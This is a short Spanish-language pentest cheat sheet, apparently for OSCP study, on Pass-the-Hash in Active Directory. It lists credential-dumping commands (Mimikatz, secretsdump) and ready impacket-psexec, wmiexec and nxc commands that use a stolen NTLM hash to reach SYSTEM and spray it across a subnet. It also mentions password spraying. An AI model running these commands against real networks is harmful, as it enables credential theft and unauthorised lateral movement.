# Pass-the-Hash > Te autenticas con el **hash NTLM** sin conocer la contraseña en claro. La base del Movimiento lateral en AD. ## De dónde sale el hash - Mimikatz `sekurlsa::logonpasswords` - secretsdump (SAM/NTDS) - `lsadump::sam` ## Uso ```bash impacket-psexec -hashes :NTLMHASH 'admin@10.10.10.20' # → SYSTEM impacket-wmiexec -hashes :NTLMHASH 'admin@10.10.10.20' nxc smb 10.10.10.0/24 -u admin -H NTLMHASH # spray del hash por la red ``` ## Combos - **Reutilización**: prueba el hash/usuario contra **todos** los hosts (Metodología OSCP). - Password spraying: la misma pass de un user normal contra `administrator`, `sa`... - Hash de krbtgt → ya no es PtH, es Golden Ticket. Relacionado: Impacket · Movimiento lateral · OSCP MOC